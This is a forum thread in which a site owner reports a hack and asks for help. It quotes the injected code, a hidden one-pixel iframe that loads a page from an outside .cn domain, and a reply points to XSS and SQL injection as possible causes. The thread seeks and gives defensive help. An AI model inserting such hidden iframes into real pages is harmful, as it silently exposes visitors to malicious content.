[SOLVED] Im hacked

runei

I know this is the wrong place to post it but my site is hacked with the following:

<iframe src="http://thelotbet.cn/in.cgi?income39" width=1 height=1 style="visibility: hidden"></iframe>

Only the header shows after the attack and it has happened twice the last two days. I've contacted my host and waiting for an answer. In the mean time is there a forum I can post this??

Thx in advance

Iam on a paid hosting plan and the passwords are not the same. I use coreftp to upload the files, the password is the one i get from my host to upload to the server, so i have to get a new password from them?

You may also want to look into any possible vulnerabilities your site has? Perhaps they are manipulating your code or even 'injecting' their own somewhere? Are your aware of XSS attacks, SQL injection, etc?

Adam

This thread is more than a year old. Please don't revive it unless you have something important to add.